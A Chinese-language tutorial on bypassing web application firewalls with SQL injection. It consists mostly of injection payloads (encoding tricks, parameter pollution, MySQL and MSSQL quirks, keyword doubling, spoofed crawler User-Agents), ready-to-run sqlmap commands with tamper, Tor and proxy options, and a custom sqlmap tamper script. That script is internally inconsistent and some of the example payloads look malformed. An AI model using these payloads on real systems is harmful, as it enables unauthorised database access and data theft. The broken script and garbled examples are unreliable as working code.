WAF绕过 | SQL注入方法详解
字数 1576 2025-08-29 22:41:44
WAF绕过与SQL注入方法详解
一、编码绕过技术
1. URL编码绕过
单次URL编码:
- 将特殊字符转换为
%加十六进制值 - 示例:
?id=1%20union%20select%201(%20代表空格)
二次URL编码:
- 针对仅解码一次的WAF
- 示例:
?id=1%2520union%2520select%25201(%2520解析为%20,然后解码为空格)
NULL字节截断:
- 使用
%00截断WAF解析 - 示例:
?id=1%00union%20select%201
SQLMap命令:
sqlmap -u "http://example.com/index.php?id=1" --tamper=percent
sqlmap -u "http://example.com/index.php?id=1" --tamper=url_double_encode
sqlmap -u "http://example.com/index.php?id=1" --hex
2. Unicode编码绕过
方法:
- 替换关键字符:
?id=un%u0069on%20select%201(%u0069代表i) - 混合编码:
?id=sel%u0065ct%20f%u0072om%20users
SQLMap命令:
sqlmap -u "http://example.com/index.php?id=1" --tamper=charunicodeencode
3. Hex/ASCII编码绕过
十六进制表示:
- MSSQL示例:
?id=1;exec(0x730065006c00650063007400200075007300650072)(select user的HEX编码)
字符拼接:
- MySQL示例:
?id=1+union+select+CONCAT(0x7e,version())
二、协议与请求特性绕过
1. HTTP参数污染
同名参数覆盖:
?id=1&id=union+select+1,2,3
参数拆分:
?id=1+union&id=select&id=1+from+admin
2. 请求方法欺骗
GET转POST:
POST /index.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
id=1+union+select+1,2,3
非常规方法:
HEAD /?id=1+union+select+1 HTTP/1.1
Host: example.com
SQLMap命令:
sqlmap -u "http://example.com/index.php" --method=POST --data="id=1"
sqlmap -u "http://example.com/index.php?id=1" --force-ssl
三、数据库特性绕过
1. MySQL绕过技术
松散空格:
- 使用
+或/**/代替空格 - 示例:
?id=1+union/**/select/**/1
内联执行:
- 示例:
?id=1+/*!50001union*+/*!50001select*/database()
SQLMap命令:
sqlmap -u "http://example.com/index.php?id=1" --tamper=space2plus --dbms=mysql
2. MSSQL绕过技术
HEX编码:
- 示例:
?id=1;exec(0x770061006900740066006f0072002000640065006c0061007900)
变量声明:
- 示例:
?id=1;declare @a varchar(50);set @a='sel'+'ect user';exec(@a)
SQLMap命令:
sqlmap -u "http://example.com/index.php?id=1" --dbms=mssql --hex
四、规则策略绕过
1. 关键字拆分与替换
双写绕过:
?id=1+ununionion+selselectect+1
符号替换:
?id=1||1=1(||代替OR)
2. 白名单与速率限制绕过
伪造User-Agent:
GET /?id=1+union+select+1 HTTP/1.1
Host: example.com
User-Agent: Baiduspider
低频率请求:
- 使用Burp Intruder设置多个代理IP轮询
SQLMap命令:
sqlmap -u "http://example.com/index.php?id=1" --random-agent --tor --proxy=http://127.0.0.1:8080
五、SQLMap高级绕过组合
常见组合命令
sqlmap -u "http://example.com/index.php?id=1" --dbs --random-agent --tamper=between,charunicodeencode,percent
sqlmap -u "http://example.com/index.php" --data="id=1" --method=POST --dbs --tamper=space2comment
sqlmap -u "http://example.com/index.php?id=1" --dbs --level=5 --risk=3 --random-agent --hex --tamper=between,space2comment
六、多功能SQLMap Tamper脚本
脚本功能
- URL双重编码(
%20→%2520) - 空格替换
+ =替换为LIKE- SQL关键字大小写混淆
- SQL关键字注释混淆(
SELECT→/**/SELECT/**/) - 十六进制编码
- 关键字双写绕过(
SELECT→SELECTSELECT) - URL空格换行符绕过(
+替换为%0A)
脚本代码
import binascii
import random
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
def tamper(payload, **kwargs):
if not payload:
return payload
# 1. URL双重编码
payload = payload.replace(" ", "%20").replace("%", "%25")
# 2. 空格替换`+`
payload = payload.replace("%20", "+")
# 3. 替换`=`为`LIKE`
payload = payload.replace("=", " LIKE ")
# 4. SQL关键字大小写混淆(随机大小写)
new_payload = ""
for char in payload:
if char.isalpha() and random.choice([True, False]):
new_payload += char.upper()
else:
new_payload += char.lower()
payload = new_payload
# 5. SQL关键字注释混淆
keywords = ["SELECT", "UNION", "FROM", "WHERE", "INSERT", "UPDATE", "DELETE"]
for keyword in keywords:
payload = payload.replace(keyword, f"/**/{keyword}/**/")
# 6. 十六进制编码
hex_payload = "0x" + binascii.hexlify(payload.encode()).decode()
payload = hex_payload
# 7. 关键字双写绕过
for keyword in keywords:
payload = payload.replace(keyword, keyword * 2)
# 8. URL空格换行符绕过
payload = payload.replace("+", "%0A")
return payload
使用方式
sqlmap -u "http://example.com/index.php?id=1" --tamper=combined_bypass
七、实战案例
-
安全狗绕过:
%00截断:?id=1%00union%20select%201- 逻辑混淆:
?id=1+a%n%d+1=1
-
Discuz X绕过:
- 反引号绕过:
?id=@'\union\select\1\from\admin
- 反引号绕过:
-
IIS绕过:
- 字符编码混淆:
?id=SEL%E%CT%201+FROM%20users
- 字符编码混淆: